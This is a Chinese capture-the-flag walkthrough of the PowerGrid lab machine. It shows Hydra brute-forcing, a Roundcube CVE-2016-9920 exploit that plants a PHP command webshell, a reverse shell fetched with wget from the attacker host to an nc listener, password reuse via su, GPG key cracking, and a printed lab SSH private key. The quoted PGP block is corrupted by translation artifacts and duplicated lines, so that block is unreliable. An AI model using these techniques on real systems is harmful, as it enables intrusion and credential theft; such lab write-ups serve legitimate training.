動態

詳情 返回 返回

powerGrid靶機覆盤WP - 動態 詳情

查看官方Hint,提示有弱密碼,後續需要重視爆破

nmap掃描

端口掃描

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ nmap -sT -p- 10.10.10.150 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 08:34 EST
Nmap scan report for 10.10.10.150
Host is up (0.0034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE
80/tcp  open  http
143/tcp open  imap
993/tcp open  imaps
MAC Address: 00:0C:29:E5:0A:A8 (VMware)

tcp詳細信息掃描

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ nmap -sT -sC -sV -O -p80,143,993 10.10.10.150 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 08:36 EST
Nmap scan report for 10.10.10.150
Host is up (0.0015s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
|_http-title: PowerGrid - Turning your lights off unless you pay.
|_http-server-header: Apache/2.4.38 (Debian)
143/tcp open  imap     Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
|_imap-capabilities: IDLE post-login have LITERAL+ LOGINDISABLEDA0001 IMAP4rev1 more listed LOGIN-REFERRALS ENABLE capabilities ID Pre-login STARTTLS OK SASL-IR
993/tcp open  ssl/imap Dovecot imapd
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: IDLE AUTH=PLAINA0001 LITERAL+ have IMAP4rev1 more LOGIN-REFERRALS listed ENABLE capabilities ID Pre-login post-login OK SASL-IR
| ssl-cert: Subject: commonName=powergrid
| Subject Alternative Name: DNS:powergrid
| Not valid before: 2020-05-19T16:49:55
|_Not valid after:  2030-05-17T16:49:55
MAC Address: 00:0C:29:E5:0A:A8 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

這裏對於imap(s)的掃描結果不太瞭解,查資料得知:

LOGINDISABLED 功能指示禁用 LOGIN 命令 ,並且即使用户名和密碼有效,服務器也會對任何嘗試使用 LOGIN 命令進行響應 super::Error::No 響應

AUTH=PLAIN 是指用於互聯網消息訪問協議 (IMAP) 中身份驗證的特定簡單身份驗證和安全層 (SASL) 機制。此機制允許客户端使用純文本用户名和密碼向 IMAP 服務器進行身份驗證

A001應該是登錄失敗的狀態

也就是説如果要爆破,爆破993端口,143沒辦法爆破

nmap腳本掃描

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ nmap -sT --script=vuln -p80,143,993 10.10.10.150 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-06 08:38 EST
Nmap scan report for 10.10.10.150
Host is up (0.0030s latency).

PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 198.18.0.151
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
143/tcp open  imap
993/tcp open  imaps
MAC Address: 00:0C:29:E5:0A:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 35.53 seconds

入口點

訪問web頁面,可以看到:

這裏有幾個用户名,放到用户名字典裏

進行web目錄掃描:

/images下的圖片隱寫爆破失敗

/index.php/login不是登錄頁面

/zmail下有個類似webdav的登錄表單彈窗

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ davtest -url http://10.10.10.150/zmail
********************************************************
 Testing DAV connection
OPEN		FAIL:	http://10.10.10.150/zmail	Unauthorized. Basic realm="Login is required"

抓包發現用的是basic認證

hydra會自動根據認證規則進行轉換,使用http-get可以嘗試登錄受保護的資源

結合hint,這個表單和imaps應該是重點爆破的對象

先嚐試一下有沒有顛倒用户名順序等弱密碼

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ hydra -L user.txt -e nsr 10.10.10.150 http-get /zmail
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-07 00:05:36
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking http-get://10.10.10.150:80/zmail
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-07 00:05:36

再使用rockyou字典進行嘗試,雖然只有三個用户,但是用rockyou爆破數量還是太大了,我等了較長時間沒有爆破出來,於是改為單用户並行爆破

同時嘗試從143,993端口一邊查資料進行突破,但是沒有找到有效的線索

掃了大概一個多小時,p48用户掃出來一個密碼

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ hydra -l p48 -P /usr/share/wordlists/rockyou.txt 10.10.10.150 http-get /zmail
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-07 02:16:43
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://10.10.10.150:80/zmail
[STATUS] 3538.00 tries/min, 3538 tries in 00:01h, 14340861 to do in 67:34h, 16 active
[STATUS] 3578.67 tries/min, 10736 tries in 00:03h, 14333663 to do in 66:46h, 16 active
[STATUS] 1403.27 tries/min, 11881 tries in 00:08h, 14332518 to do in 170:14h, 16 active
[STATUS] 2558.26 tries/min, 42126 tries in 00:16h, 14302273 to do in 93:11h, 16 active
[ERROR] Child with pid 16838 terminating, can not connect
[STATUS] 2265.55 tries/min, 73555 tries in 00:32h, 14270844 to do in 104:60h, 16 active
[80][http-get] host: 10.10.10.150   login: p48   password: electrico
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-07 02:59:22

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ davtest -url http://10.10.10.150/zmail -auth p48:electrico
********************************************************
 Testing DAV connection
OPEN		FAIL:	http://10.10.10.150/zmail	Operation failed. You can only open a collection (directory)

沒有探測到資源,直接登錄

登錄之後有一個roundcube登錄表單

谷歌一下roundcube,發現是imap的客户端:

嘗試繼續用這個賬户登錄,不行再用爆破的密碼碰撞,登錄成功

查看郵件信息:

Listen carefully. We are close to our attack date. Nothing is going to stop us now. Our malware is heavily planted in each power grid across Europe.
All it takes is a signal from this server after the timer has stopped, 
and nothing is going to stop that now. 
For information, I have setup a backup server located on the same network - 
you shouldn't need to access it for now, but if you do, scan for its local IP and use the SSH key encrypted below (it is encrypted with your GPG key,
by the way). The backup server has root access to this main server - if you need to make any backups, I will leave it for you to work out how. I haven't got time to explain - we are too close to launching our hack.
䏃。我們即將發作日期。
現在沒有什麼能阻止我們。
我們的惡意軟件大量植入歐洲的每個電網中。
所需要的只是計時器停止後來自該服務器的信號,
現在沒有什麼可以阻止它。
有關信息,我已經在同一網絡上設置了一個備份服務器 -
您現在不需要訪問它,但如果您這樣做,
請掃描其本地 IP 並使用下面加密的 SSH 密鑰
(順便説一句,它是使用您的 GPG 密鑰加密的)。備份服務器對此主服務器具有 root 訪問權限 - 如果您需要進行任何備份,我將留給您自行決定如何進行。我沒有時間解釋 - 我們離啓動黑客攻擊太近了。

-----BEGIN PGP MESSAGE-----
-----開始 PGP 消息-----

hQIMA1WQQb/tVNOiARAAub7X4CF6QEiz1OgByDAO4xKwLCM2OqkrEVb09Ay2TVVr
2YY2Vc3CjioPmIp1jqNn/LVLm1Tbuuqi/0C0fbjUTIs2kOWqSQVVpinvLPgD4K+J
OykGxnN04bt9IrJddlkw3ZyZUjCBG46z+AS1h+IDCRezGz6Xq9lipFZwybSmL89J
OykGxnN04bt9IrJddlkw3ZyZUjCBG46z+AS1 小時+IDCRezGz6Xq9lipFZwybSmL89J
pijIYF9JAl5PeSQK9kTHOkAXIsLUPvg8fsfa9UqGTZfxS6VhlNmsoFDf4mU6lSMl
k4VC2HDJwXoD+dEdV5dX1vMLQ5CKETR1NjaWV/D++YTaZMO+wj5/qekfhqDXh0Yo
4KhqKKlAbk/XhPuRmuj/FnS/8zwlYH9wPYuacBPXLwCIzaQzkn5I+7rVeeMqoT82
c2F7ASQy79COk9eU900ToCyjjXQwnlBaQ51QOZjnQgcEnKVmrbURgzpQUVzdy8Oy
XvysJt3OBIJ9zT1l7fq5slmCjVAq8G2nlhdNv1K27+79eVPzrJ3pqg+MlssXRb3T
PQ3hPgKR7U/YgU6O9YorAoJmgxD2CsmGrmK66jwbTKBONTxcfUg+gu1z8Ad4gleL
+Gbk4qMuLVFGzEBdeJYzRD7m6F3Ow/evwjzMr5fDdSOUSATOKuki0dOx14OTFNzP
CJbDZzquZ294lvFviYMSNQy7cWNN86gVQWyWUW0f+Ui3UONTIr9e0gLez/OJUwzS
6wHHu7TA3lgwvc/iMjpuPLnGo046T8J0IqXZHOIn0LJXP36I0l4vTAGtKpZuGNS+
zT/R1y6eIBd5CInFwLXbkbhOomwEfbHQci0zKHzjpEnx8a18zbuNLB4dclN3nyni
Fnh2S0YYPEoJXWKA6ToNuQF/GZyI8QKELyc4ZhkHiKmdN6Q9z659JWQOnM/MW+tB
Fnh2S0YYPEoJXWKA6ToNuQF/GZyI8QKELyc4ZhkHiKmdN6Q9z659JWQOnM/兆瓦+噸
sjxwjesbAO+hjc19ok0VUsiMVj8TnUuB1Ifgf4ItnDzP8Myc59/FaS46eVy7Y7M1
sICrc62wVLkglG2zjIvTF3CYPYrJDB6+BXOGJv7vpPdcbpaVwc1KYjZW9JMfVLIz
NGY1zaz5nY9sZw/Q5rmYyUAzHnMjuOkRNjRuSjEHHZEG/gLLco6GCeBQzZqvyiXM
auuvO37nFduss3U+7sLd4K3IabgZZHaEu4QEDiuZc40WVSZOIhv5srcLnky2GSPe
a0xjQxSvMNKroyx2IoKLNkUq1fDGbGD/Wu4erOz/TO0/SqnAJK9Mqh6CjUhAZwxE
m+ALMtyYd3wyUcclqG1ruprGKKMB0KRNxAtIL+RXmUvqhoPAazqZ/X6QW+mekt6f
/sBuDEXD++UPqYi24kO0E1UB8bdRNP+sVxdFMoImahcqRog1tPp09aVcLcEtQBIP
7CZ/kUsQmEe5yPbK5W/0xSo8+B4OranG9eHvjQlu/pS6GCsyT8NzEiZYMVQ5qs/A
04Rm5H5V7W+elw9svPBSjDj6XBhUvUekJ9jU7es018k2fZ8gid1kFurNZ7xOLyTL
04 馬幣 5H5V7W+elw9svPBSjDj6XBhUvUekJ9jU7es018k2fZ8gid1kFurNZ7xOLyTL
ebzLqsOszwIhGYEpYnt2m9R0M7eoEq4pmwfra5oaaNrDhKFAp6DddERMNmembr42
cLH1xBWuE2AVqFwbeEUYjVt+Sy1OauuAGkMy9KxXSzR//1wQ0hojooz6XsY/a3c1
cLH1xBWuE2AVqFwbeEUYjVt+Sy1OauuAGkMy9KxXSzR1wQ0hojooz6XsY/a3c1
huvrG4CzMT8cPbNDMSvOGca0l+QpmQ7qg14sYZuJcqARue07DgpQIsOXeUspFooO
lOUsNrJwJcpWJViKuJ9XuwcprBowdz6Y6WmeY57R13ivoHy+j+2s2Sefq6rjMzEw
HtatDtk9BA4gBFREqSldmepAnvE3GiJJEYHwC7sQCoqNB15/ftTM9LtbMRe05FXm
HtatDtk9BA4gBFREqSldmepAnvE3GiJJEYHwC7sQCoqNB15/英尺 TM9LtbMRe05FXm
9mLcD2aSP5BIy9jrCBJqPjdsnxupqeBxMx9do79iCXIXms6VbNpnBeKMZFrnFx+Z
LMd13s2pWA0CApb3JATcGa4adKs2k4L08oSr+revlX3fUvey090VSji+Kebi7gJ/
LMd13s2pWA0CApb3JATcGa4adKs2k4L08oSr+revlX3fUvey090VSji+科比 7gJ/
l08BWpMZbLbf9J6zgbLbWfl8OQbYLl94A8lTDK5m7JKLSSL/B16jx2LWPIGSszLS
NxlWCk0ae5Lf75Bbux12xkDukXsODd+hkksNQ4M/E8wgBoRmrL9P/CUX4YvrVT9u
qK98rhQPeIJMYwYiZVb4K7L18EyKK6S+jn5LwwUxzpkRRNZ8mg+lbtiSwTDtG8IK
l6+3kTIPcECGPbghf0GFH7PnQY8f0MO9IbYsy2pcoagGtizUecyraxPF9qPwoBV3
4QBz+/KLKUpqwLUoKc5PLn7RAJcXZiY8QkSBW6jbieoblylDOIuDjpd3IYqCqjW8
WOI/XS4zi5R3mozMosLrohm27iDsuFNnEIiWFITYTrHuNRk1xW4YoZPiW22mp7qE
沃伊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
RO1va5L9lriZ1vmP37FxIwsrCVVcNrPJxWydvw==
=fPY9
-----END PGP MESSAGE-----
-----結束 PGP 消息-----

也就是説,我們需要拿到初始權限,然後想辦法拿到p48的gpg密鑰,即使p48可能還是密碼複用,由於不能ssh連接,需要另想辦法

roundcube我記得有幾個漏洞,如果可以確認版本的話就簡單很多

查看頂部:

有一個about的彈窗

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ searchsploit roundcube                
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
Roundcube 1.2.2 - Remote Code Execution   | php/webapps/40892.txt

該版本有遠程代碼執行漏洞,谷歌搜索

github有相關腳本,克隆下來

readme提供的執行方法:

./exploit.py --host HOST --user USERNAME --pwd PASSWORD --path PATH --www_path WEB_DIRECTORY

這裏我們登錄的時候是用了雙層登錄,即登錄了webdav之後再登錄的roundcube,webdav用的是basic認證

使用p48:electrico@在url中嵌入憑據

當瀏覽器遇到這個格式時,會自動在HTTP請求頭中添加 Authorization: Basic cDQ4OmVsZWN0cmljbw== 字段,這樣會自動登錄到roundcube登錄表單頁面,否則腳本直接訪問時登不進去

┌──(kali㉿kali)-[~/…/replay/rereplay/powergrid/exploit-CVE-2016-9920]
└─$ ./exploit.py --host p48:electrico@10.10.10.150 --user p48 --pwd electrico --path zmail --www_path /var/www/html/zmail
[+] CVE-2016-9920 exploit by t0kx
[+] Exploiting p48:electrico@10.10.10.150
[+] Target exploited, acessing shell at http://p48:electrico@10.10.10.150/zmail/backdoor.php
[+] Running whoami: www-data
[+] Done

成功執行

查看腳本邏輯

cmd = "<?php echo passthru($_GET['cmd']); ?>"

可以看到木馬的參數是cmd,嘗試修改木馬為POST參數或反彈shell,報錯

那就用作者提供的木馬先試試,嘗試wget攻擊機的反彈shell

注意這裏不用php的簡易服務器開本地服務,之前文章提到過原因

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.150 - - [07/Nov/2025 09:34:52] "GET /php.php HTTP/1.1" 200 -
10.10.10.150 - - [07/Nov/2025 09:34:52] "GET /php.php HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.156] from (UNKNOWN) [10.10.10.150] 59924
Linux powergrid 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 14:36:19 up  1:12,  0 users,  load average: 0.01, 0.09, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty

反彈成功

提權

經過一系列在www-data上的枚舉後,沒有找到新的線索

考慮到之前沒有嘗試登錄p48是因為ssh端口沒有開放,並非排除了弱密碼登的可能

所以再用之前爆出的密碼登一次

www-data@powergrid:/$ su - p48
su - p48
Password: electrico

p48@powergrid:~$

成功登錄

按照之前在roundcube得到的線索,我們需要找到p48的gpg密鑰

以及同一子網下的主機

密鑰在自己的用户目錄下

gpg解密

先導入asc密鑰

提示輸入密碼

使用john爆破

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ gpg2john a.asc>hash.txt

File a.asc
                                                  
┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
No password hashes left to crack (see FAQ)
                                           

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ john hash.txt --show
P48 Hacker:electrico:::P48 Hacker <p48@powergrid>::a.asc

1 password hash cracked, 0 left

可以看到密鑰的密碼還是electrico

┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ gpg --import a.asc
gpg: key 73D19820E29199BD: "P48 Hacker <p48@powergrid>" not changed
gpg: key 73D19820E29199BD: secret key imported
gpg: Total number processed: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1


┌──(kali㉿kali)-[~/Redteam/replay/rereplay/powergrid]
└─$ gpg --decrypt a.pgp
gpg: encrypted with rsa4096 key, ID 559041BFED54D3A2, created 2020-05-19
      "P48 Hacker <p48@powergrid>"
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
gpg: Signature made Tue 19 May 2020 03:17:30 PM EDT
gpg:                using RSA key 76234C43E84EFC92904CAC8C73D19820E29199BD
gpg: Good signature from "P48 Hacker <p48@powergrid>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: 7623 4C43 E84E FC92 904C  AC8C 73D1 9820 E291 99BD

得到了一個ssh私鑰

p48@powergrid:~$ ip a
ip a
